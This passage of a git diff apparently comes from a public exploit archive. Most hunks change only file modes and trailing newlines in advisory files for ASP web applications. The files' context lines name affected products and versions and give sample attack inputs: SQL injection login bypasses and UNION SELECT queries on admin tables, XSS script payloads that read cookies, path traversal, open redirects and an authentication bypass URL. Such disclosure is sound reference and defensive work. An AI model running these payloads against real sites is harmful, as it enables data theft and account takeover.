+5,4 @@ The H3C ER5100 is prone to a remote authentication-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. http://www.example.com:8080/home.asp?userLogin.asp -http://www.example.com:8080/wan_NAT.asp?userLogin.asp \ No newline at end of file +http://www.example.com:8080/wan_NAT.asp?userLogin.asp \ No newline at end of file diff --git a/platforms/asp/webapps/35923.txt b/platforms/asp/webapps/35923.txt old mode 100755 new mode 100644 index fea49e929..d616bac58 --- a/platforms/asp/webapps/35923.txt +++ b/platforms/asp/webapps/35923.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica http://www.example.com/Page.aspx?search=1[XSSCode]&mID=1641&Page=search/advancedsearch http://www.example.com/News/shownews/[page].aspx?NewsId=[Sqli] -http://www.example.com/[Path]/Default.aspx?tabid=[Sqli] \ No newline at end of file +http://www.example.com/[Path]/Default.aspx?tabid=[Sqli] \ No newline at end of file diff --git a/platforms/asp/webapps/35926.txt b/platforms/asp/webapps/35926.txt old mode 100755 new mode 100644 index cb81fcea7..0bd5fa348 --- a/platforms/asp/webapps/35926.txt +++ b/platforms/asp/webapps/35926.txt @@ -4,4 +4,4 @@ eTAWASOL is prone to an SQL-injection vulnerability because the application fail A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/npages/back.asp?id=[SQL] \ No newline at end of file +http://www.example.com/npages/back.asp?id=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/36001.txt b/platforms/asp/webapps/36001.txt old mode 100755 new mode 100644 index 5cc662fbb..e30e4964b --- a/platforms/asp/webapps/36001.txt +++ b/platforms/asp/webapps/36001.txt @@ -6,4 +6,4 @@ Successful exploits may redirect a user to a potentially malicious site; this ma Sitecore CMS versions 6.4.1 rev. 110324 and prior are vulnerable. -http://www.example.com/sitecore/shell/default.aspx?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=0 \ No newline at end of file +http://www.example.com/sitecore/shell/default.aspx?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=0 \ No newline at end of file diff --git a/platforms/asp/webapps/36010.txt b/platforms/asp/webapps/36010.txt old mode 100755 new mode 100644 index 934fd0470..4750de8fe --- a/platforms/asp/webapps/36010.txt +++ b/platforms/asp/webapps/36010.txt @@ -4,4 +4,4 @@ BESNI OKUL PORTAL is prone to a cross-site scripting vulnerability because it fa An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/[PATH]/sayfa.asp?islem=1&AltKategoriNo=42&AltKategoriAdi=<script>alert(document.domain)</script> \ No newline at end of file +http://www.example.com/[PATH]/sayfa.asp?islem=1&AltKategoriNo=42&AltKategoriAdi=<script>alert(document.domain)</script> \ No newline at end of file diff --git a/platforms/asp/webapps/36011.txt b/platforms/asp/webapps/36011.txt old mode 100755 new mode 100644 index 70fc45fe0..845bd25b1 --- a/platforms/asp/webapps/36011.txt +++ b/platforms/asp/webapps/36011.txt @@ -4,4 +4,4 @@ Ataccan E-ticaret scripti is prone to an SQL-injection vulnerability because it Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/name.asp?id=[SQLInjection] \ No newline at end of file +http://www.example.com/name.asp?id=[SQLInjection] \ No newline at end of file diff --git a/platforms/asp/webapps/36019.txt b/platforms/asp/webapps/36019.txt old mode 100755 new mode 100644 index c9856e862..07c29052d --- a/platforms/asp/webapps/36019.txt +++ b/platforms/asp/webapps/36019.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Community Server 2007 and 2008 are vulnerable; other versions may also be affected. -http://www.example.com/utility/TagSelector.aspx?TagEditor=[XSS] \ No newline at end of file +http://www.example.com/utility/TagSelector.aspx?TagEditor=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/36063.txt b/platforms/asp/webapps/36063.txt old mode 100755 new mode 100644 index 4c0bd9fe9..6ee8923ee --- a/platforms/asp/webapps/36063.txt +++ b/platforms/asp/webapps/36063.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a The following example input is available: Username : ' or 1=1 or ''='' -Password: ' or 1=1 or ''='' \ No newline at end of file +Password: ' or 1=1 or ''='' \ No newline at end of file diff --git a/platforms/asp/webapps/36064.txt b/platforms/asp/webapps/36064.txt old mode 100755 new mode 100644 index 4fe4fc7cb..6945f29d1 --- a/platforms/asp/webapps/36064.txt +++ b/platforms/asp/webapps/36064.txt @@ -4,4 +4,4 @@ Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerabili Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/CS0106/category.asp?cat=[sqli] \ No newline at end of file +http://www.example.com/CS0106/category.asp?cat=[sqli] \ No newline at end of file diff --git a/platforms/asp/webapps/36065.txt b/platforms/asp/webapps/36065.txt old mode 100755 new mode 100644 index 9b1762778..c8a716f9f --- a/platforms/asp/webapps/36065.txt +++ b/platforms/asp/webapps/36065.txt @@ -4,4 +4,4 @@ Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerabili Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/CS0077/main.asp?key=[sqli] \ No newline at end of file +http://www.example.com/CS0077/main.asp?key=[sqli] \ No newline at end of file diff --git a/platforms/asp/webapps/36066.txt b/platforms/asp/webapps/36066.txt old mode 100755 new mode 100644 index 29a641371..0064a9c3a --- a/platforms/asp/webapps/36066.txt +++ b/platforms/asp/webapps/36066.txt @@ -4,4 +4,4 @@ Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/CS0099/index.asp?Q=2&A=[sqli] \ No newline at end of file +http://www.example.com/CS0099/index.asp?Q=2&A=[sqli] \ No newline at end of file diff --git a/platforms/asp/webapps/36116.txt b/platforms/asp/webapps/36116.txt old mode 100755 new mode 100644 index 9314c8b44..8d78c73b9 --- a/platforms/asp/webapps/36116.txt +++ b/platforms/asp/webapps/36116.txt @@ -4,4 +4,4 @@ Kisanji is prone to a cross-site scripting vulnerability because it fails to pro An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/default.aspx?gr=[xss] \ No newline at end of file +http://www.example.com/default.aspx?gr=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/36133.txt b/platforms/asp/webapps/36133.txt old mode 100755 new mode 100644 index 62b583d65..a8519add5 --- a/platforms/asp/webapps/36133.txt +++ b/platforms/asp/webapps/36133.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary script code in the brows Orion Network Performance Monitor 10.1.3 is affected; other versions may also be vulnerable. -http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E \ No newline at end of file +http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/36134.txt b/platforms/asp/webapps/36134.txt old mode 100755 new mode 100644 index b881017a3..5d5395aa2 --- a/platforms/asp/webapps/36134.txt +++ b/platforms/asp/webapps/36134.txt @@ -9,4 +9,4 @@ The following products are affected; Microsoft SharePoint 2007 Microsoft SharePoint 2010 -http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss] \ No newline at end of file +http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/36138.txt b/platforms/asp/webapps/36138.txt old mode 100755 new mode 100644 index 134f201e8..e834c12f9 --- a/platforms/asp/webapps/36138.txt +++ b/platforms/asp/webapps/36138.txt @@ -6,4 +6,4 @@ A successful exploit will allow an attacker to compromise the application, acces ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin \ No newline at end of file +http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/36139.txt b/platforms/asp/webapps/36139.txt old mode 100755 new mode 100644 index c127b5d4b..63009085b --- a/platforms/asp/webapps/36139.txt +++ b/platforms/asp/webapps/36139.txt @@ -16,4 +16,4 @@ http://www.example.com/kategoriler.asp?id=4%28%29 [SQL] http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL] -http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin \ No newline at end of file +http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/36141.txt b/platforms/asp/webapps/36141.txt old mode 100755 new mode 100644 index 13686893c..a2d9c3455 --- a/platforms/asp/webapps/36141.txt +++ b/platforms/asp/webapps/36141.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS] \ No newline at end of file +http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/36146.txt b/platforms/asp/webapps/36146.txt old mode 100755 new mode 100644 index 48b24bcd3..04f15ce23 --- a/platforms/asp/webapps/36146.txt +++ b/platforms/asp/webapps/36146.txt @@ -6,4 +6,4 @@ An attacker could leverage this issue to execute arbitrary script code in the br i-Gallery 3.4 is vulnerable; other versions may also be affected. -http://www.example.com/igallery.asp?d="><script>alert('kurd-team')</script> \ No newline at end of file +http://www.example.com/igallery.asp?d="><script>alert('kurd-team')</script> \ No newline at end of file diff --git a/platforms/asp/webapps/36284.txt b/platforms/asp/webapps/36284.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/36375.txt b/platforms/asp/webapps/36375.txt old mode 100755 new mode 100644 index 6a33e1b0a..3a6a8d987 --- a/platforms/asp/webapps/36375.txt +++ b/platforms/asp/webapps/36375.txt @@ -8,4 +8,4 @@ Virtual Vertex Muster 6.1.6 is vulnerable; other versions may also be affected. The following example request is available: -GET /a\..\..\muster.db HTTP/1.1 \ No newline at end of file +GET /a\..\..\muster.db HTTP/1.1 \ No newline at end of file diff --git a/platforms/asp/webapps/36402.txt b/platforms/asp/webapps/36402.txt old mode 100755 new mode 100644 index e7e7cc922..ad493b0c1 --- a/platforms/asp/webapps/36402.txt +++ b/platforms/asp/webapps/36402.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Hero 3.69 is vulnerable; other versions may also be affected. -http://www.example.com/hero_os/events?month=January.htaccess.aspx%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file +http://www.example.com/hero_os/events?month=January.htaccess.aspx%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/36515.txt b/platforms/asp/webapps/36515.txt old mode 100755 new mode 100644 index 8b1e9f296..e5b4ba0c7 --- a/platforms/asp/webapps/36515.txt +++ b/platforms/asp/webapps/36515.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica DIGIT CMS 1.0.7 is vulnerable; other versions may also be affected. -http://www.example.com/path/Default.asp?sType=0&PageId=[Sqli] \ No newline at end of file +http://www.example.com/path/Default.asp?sType=0&PageId=[Sqli] \ No newline at end of file diff --git a/platforms/asp/webapps/36547.txt b/platforms/asp/webapps/36547.txt old mode 100755 new mode 100644 index 71ebacf02..72e89021e --- a/platforms/asp/webapps/36547.txt +++ b/platforms/asp/webapps/36547.txt @@ -9,4 +9,4 @@ Professional, Enterprise, and Premium 4.26 and prior versions Professional, Enterprise, and Premium 5.52 and prior versions Professional, Enterprise, and Premium 6.02 and prior versions -http://example.com/mewebmail/Mondo/lang/sys/ForgottenPassword.aspx?Username=[xss] \ No newline at end of file +http://example.com/mewebmail/Mondo/lang/sys/ForgottenPassword.aspx?Username=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/36585.txt b/platforms/asp/webapps/36585.txt old mode 100755 new mode 100644 index 7e7f04676..26f556703 --- a/platforms/asp/webapps/36585.txt +++ b/platforms/asp/webapps/36585.txt @@ -4,4 +4,4 @@ Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/forum.asp?TOPIC_ID=[SQL] \ No newline at end of file +http://www.example.com/forum.asp?TOPIC_ID=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/36588.txt b/platforms/asp/webapps/36588.txt old mode 100755 new mode 100644 index 18701d6e6..c07ee3cdd --- a/platforms/asp/webapps/36588.txt +++ b/platforms/asp/webapps/36588.txt @@ -10,4 +10,4 @@ http://www.example.com/admin/admin_colors.asp?"><script>alert('XSS')</script> http://www.example.com/admin/admin_config.asp?"><script>alert('XSS')</script> -http://www.example.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script> \ No newline at end of file +http://www.example.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script> \ No newline at end of file diff --git a/platforms/asp/webapps/36599.txt b/platforms/asp/webapps/36599.txt old mode 100755 new mode 100644 index f35b8d376..24c87c406 --- a/platforms/asp/webapps/36599.txt +++ b/platforms/asp/webapps/36599.txt @@ -6,4 +6,4 @@ Raven 1.0 is vulnerable; other versions may also be affected. http://www.example.com/[patch]/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/ -http://www.example.com/forum/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/ \ No newline at end of file +http://www.example.com/forum/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/ \ No newline at end of file diff --git a/platforms/asp/webapps/36934.txt b/platforms/asp/webapps/36934.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/36935.txt b/platforms/asp/webapps/36935.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/36936.txt b/platforms/asp/webapps/36936.txt old mode 100755 new mode 100644 index 6a39e6548..cf4a9efe6 --- a/platforms/asp/webapps/36936.txt +++ b/platforms/asp/webapps/36936.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br SAP Business Objects XI R2 is vulnerable; other versions may be affected. -https://www.example.com/businessobjects/enterprise115/infoview/webi/webi_modify.aspx?id=&#039;+alert(&#039;XSS&#039;)+&#039;# \ No newline at end of file +https://www.example.com/businessobjects/enterprise115/infoview/webi/webi_modify.aspx?id=&#039;+alert(&#039;XSS&#039;)+&#039;# \ No newline at end of file diff --git a/platforms/asp/webapps/37015.txt b/platforms/asp/webapps/37015.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/37119.txt b/platforms/asp/webapps/37119.txt old mode 100755 new mode 100644 index 35dae5c3d..5a3af27aa --- a/platforms/asp/webapps/37119.txt +++ b/platforms/asp/webapps/37119.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a http://www.example.com/[patch]/profile.asp?$sid=&id=[SQL] http://www.example.com/[patch]/forum.asp?$sid=&id=[SQL] -http://www.example.com/[patch]/topic.asp?$sid=&id=[SQL] \ No newline at end of file +http://www.example.com/[patch]/topic.asp?$sid=&id=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/37121.txt b/platforms/asp/webapps/37121.txt old mode 100755 new mode 100644 index a15e231c5..46d87051d --- a/platforms/asp/webapps/37121.txt +++ b/platforms/asp/webapps/37121.txt @@ -8,4 +8,4 @@ http://www.example.com/ShowPost.asp?ThreadID=[SQL] http://www.example.com/blog.asp?id=[SQL] http://www.example.com/ShowForum.asp?ForumID=[SQL] http://www.example.com/Profile.asp?UserName=[SQL] -http://www.example.com/print.asp?id=[SQL] \ No newline at end of file +http://www.example.com/print.asp?id=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/37222.txt b/platforms/asp/webapps/37222.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/37223.txt b/platforms/asp/webapps/37223.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/37447.txt b/platforms/asp/webapps/37447.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/37488.txt b/platforms/asp/webapps/37488.txt old mode 100755 new mode 100644 index c3d330b3e..00580964d --- a/platforms/asp/webapps/37488.txt +++ b/platforms/asp/webapps/37488.txt @@ -7,4 +7,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. WebsitePanel versions prior to 1.2.2.1 are vulnerable. https://www.example.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain> -https://www.example1.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain>/file.exe> \ No newline at end of file +https://www.example1.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain>/file.exe> \ No newline at end of file diff --git a/platforms/asp/webapps/37533.txt b/platforms/asp/webapps/37533.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/37577.txt b/platforms/asp/webapps/37577.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3767.txt b/platforms/asp/webapps/3767.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/37676.txt b/platforms/asp/webapps/37676.txt old mode 100755 new mode 100644 index 5a064bf72..e6af02310 --- a/platforms/asp/webapps/37676.txt +++ b/platforms/asp/webapps/37676.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com//Questions.asp?id="><script>alert(0);</script> -http://www.example.com/search.asp?7="><script>alert(0);</script>&Search=Search \ No newline at end of file +http://www.example.com/search.asp?7="><script>alert(0);</script>&Search=Search \ No newline at end of file diff --git a/platforms/asp/webapps/37678.txt b/platforms/asp/webapps/37678.txt old mode 100755 new mode 100644 index 2d5fb7515..36816884d --- a/platforms/asp/webapps/37678.txt +++ b/platforms/asp/webapps/37678.txt @@ -10,4 +10,4 @@ http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert( http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E -http://www.www.example.com/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage="><script>alert(0);</script>&TopicID=57676 \ No newline at end of file +http://www.www.example.com/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage="><script>alert(0);</script>&TopicID=57676 \ No newline at end of file diff --git a/platforms/asp/webapps/37689.txt b/platforms/asp/webapps/37689.txt old mode 100755 new mode 100644 index 6d875f6d1..bc8d400ff --- a/platforms/asp/webapps/37689.txt +++ b/platforms/asp/webapps/37689.txt @@ -23,4 +23,4 @@ Http response : 28 Microsoft OLE DB Provider for SQL Server 8 21 error ' 8 80040e14 8 ' 1f -84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f \ No newline at end of file +84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f \ No newline at end of file diff --git a/platforms/asp/webapps/37696.txt b/platforms/asp/webapps/37696.txt old mode 100755 new mode 100644 index 751815c18..b4738ce1e --- a/platforms/asp/webapps/37696.txt +++ b/platforms/asp/webapps/37696.txt @@ -10,4 +10,4 @@ http://www.example.com/search.asp?keywords="><script>alert(0);</script>&SearchTy http://www.example.com/search.asp?CurrentPage=1&sitekeywords"><script>alert(0);</script>&SearchType=Default -http://www.example.com/search.asp?SearchType=Keywords&Keywords="><script>alert(0);</script>&x=0&y=0 \ No newline at end of file +http://www.example.com/search.asp?SearchType=Keywords&Keywords="><script>alert(0);</script>&x=0&y=0 \ No newline at end of file diff --git a/platforms/asp/webapps/37892.txt b/platforms/asp/webapps/37892.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/37995.txt b/platforms/asp/webapps/37995.txt old mode 100755 new mode 100644 index f8f27572d..242799b53 --- a/platforms/asp/webapps/37995.txt +++ b/platforms/asp/webapps/37995.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary script code in the brows SolarWinds Orion IP Address Manager (IPAM) 3.0 is affected; other versions may also be vulnerable. -http://www.example.com/Orion/IPAM/search.aspx?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27hi%27%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/Orion/IPAM/search.aspx?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27hi%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/asp/webapps/3831.txt b/platforms/asp/webapps/3831.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/38318.txt b/platforms/asp/webapps/38318.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/38351.txt b/platforms/asp/webapps/38351.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/38415.txt b/platforms/asp/webapps/38415.txt old mode 100755 new mode 100644 index 125f52dbc..b5d3592f9 --- a/platforms/asp/webapps/38415.txt +++ b/platforms/asp/webapps/38415.txt @@ -4,4 +4,4 @@ C2 WebResource is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/fileview.asp?File=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/fileview.asp?File=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/asp/webapps/38479.txt b/platforms/asp/webapps/38479.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/38653.txt b/platforms/asp/webapps/38653.txt old mode 100755 new mode 100644 index 5b9fe0325..7d03b3e64 --- a/platforms/asp/webapps/38653.txt +++ b/platforms/asp/webapps/38653.txt @@ -4,4 +4,4 @@ Corda Highwire is prone to a path disclosure vulnerability because it fails to p An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. -http://www.example.com/highwire.ashx?url=../../ \ No newline at end of file +http://www.example.com/highwire.ashx?url=../../ \ No newline at end of file diff --git a/platforms/asp/webapps/38655.txt b/platforms/asp/webapps/38655.txt old mode 100755 new mode 100644 index 06766a7d1..25d13bd55 --- a/platforms/asp/webapps/38655.txt +++ b/platforms/asp/webapps/38655.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Corda .NET Redirector 7.3.11.6715 is vulnerable; other versions may also be affected. -http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN \ No newline at end of file +http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN \ No newline at end of file diff --git a/platforms/asp/webapps/38696.txt b/platforms/asp/webapps/38696.txt old mode 100755 new mode 100644 index 73deff9e6..b7c7925fb --- a/platforms/asp/webapps/38696.txt +++ b/platforms/asp/webapps/38696.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow DotNetNuke prior to versions 7.1.1 and 6.2.9 are vulnerable. -http://www.example.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'} \ No newline at end of file +http://www.example.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'} \ No newline at end of file diff --git a/platforms/asp/webapps/38749.txt b/platforms/asp/webapps/38749.txt old mode 100755 new mode 100644 index 723fc02ae..c807b7a93 --- a/platforms/asp/webapps/38749.txt +++ b/platforms/asp/webapps/38749.txt @@ -4,4 +4,4 @@ Flo CMS is prone to an SQL-injection vulnerability because it fails to sufficien Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/blog/index.asp?archivem=' \ No newline at end of file +http://www.example.com/blog/index.asp?archivem=' \ No newline at end of file diff --git a/platforms/asp/webapps/38879.txt b/platforms/asp/webapps/38879.txt old mode 100755 new mode 100644 index d7e8e5cab..32c0fab27 --- a/platforms/asp/webapps/38879.txt +++ b/platforms/asp/webapps/38879.txt @@ -9,4 +9,4 @@ B2B Vertical Marketplace Creator 2.0 is vulnerable; other version may also be vu www.example.com/demo/B2BVerticalMarketplace/admin.asp UserID : 1' or '1' = '1 -Password : 1' or '1' = '1 \ No newline at end of file +Password : 1' or '1' = '1 \ No newline at end of file diff --git a/platforms/asp/webapps/38883.txt b/platforms/asp/webapps/38883.txt old mode 100755 new mode 100644 index 0b10cbe6a..638754b37 --- a/platforms/asp/webapps/38883.txt +++ b/platforms/asp/webapps/38883.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues by manipulating the SQL query logic to carr EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/dweb/apps/news-events/newdetail.asp?id=1=[SQL INJECTION] \ No newline at end of file +http://www.example.com/dweb/apps/news-events/newdetail.asp?id=1=[SQL INJECTION] \ No newline at end of file diff --git a/platforms/asp/webapps/38884.txt b/platforms/asp/webapps/38884.txt old mode 100755 new mode 100644 index 9a950f717..f5eec3c47 --- a/platforms/asp/webapps/38884.txt +++ b/platforms/asp/webapps/38884.txt @@ -9,4 +9,4 @@ EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versio www.example.com/dweb/login.asp UserID : x' or ' 1=1-- -Password : x' or ' 1=1-- \ No newline at end of file +Password : x' or ' 1=1-- \ No newline at end of file diff --git a/platforms/asp/webapps/38935.txt b/platforms/asp/webapps/38935.txt old mode 100755 new mode 100644 index d92504441..5141bbdfe --- a/platforms/asp/webapps/38935.txt +++ b/platforms/asp/webapps/38935.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc CMS Afroditi 1.0 is vulnerable. -http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1 \ No newline at end of file +http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1 \ No newline at end of file diff --git a/platforms/asp/webapps/3905.txt b/platforms/asp/webapps/3905.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/39106.txt b/platforms/asp/webapps/39106.txt old mode 100755 new mode 100644 index 4fd1a14d8..a1b4f380f --- a/platforms/asp/webapps/39106.txt +++ b/platforms/asp/webapps/39106.txt @@ -4,4 +4,4 @@ eshtery CMS is prone to a local file-disclosure vulnerability because it fails t Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. - http://www.example.com/[path]/FileManager.aspx?file=E:\web\admin.asp \ No newline at end of file + http://www.example.com/[path]/FileManager.aspx?file=E:\web\admin.asp \ No newline at end of file diff --git a/platforms/asp/webapps/3914.txt b/platforms/asp/webapps/3914.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/39187.txt b/platforms/asp/webapps/39187.txt old mode 100755 new mode 100644 index 4ca12433a..001579cab --- a/platforms/asp/webapps/39187.txt +++ b/platforms/asp/webapps/39187.txt @@ -4,4 +4,4 @@ CIS Manager is prone to an SQL-injection vulnerability because it fails to suffi A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/autenticar/lembrarlogin.asp?email=[SQL Injection] \ No newline at end of file +http://www.example.com/autenticar/lembrarlogin.asp?email=[SQL Injection] \ No newline at end of file diff --git a/platforms/asp/webapps/3936.txt b/platforms/asp/webapps/3936.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/39485.txt b/platforms/asp/webapps/39485.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/39777.txt b/platforms/asp/webapps/39777.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/39850.txt b/platforms/asp/webapps/39850.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/39897.txt b/platforms/asp/webapps/39897.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/39904.txt b/platforms/asp/webapps/39904.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4007.txt b/platforms/asp/webapps/4007.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/40383.txt b/platforms/asp/webapps/40383.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4040.txt b/platforms/asp/webapps/4040.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4057.txt b/platforms/asp/webapps/4057.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4083.txt b/platforms/asp/webapps/4083.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4198.txt b/platforms/asp/webapps/4198.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/42127.txt b/platforms/asp/webapps/42127.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/4239.txt 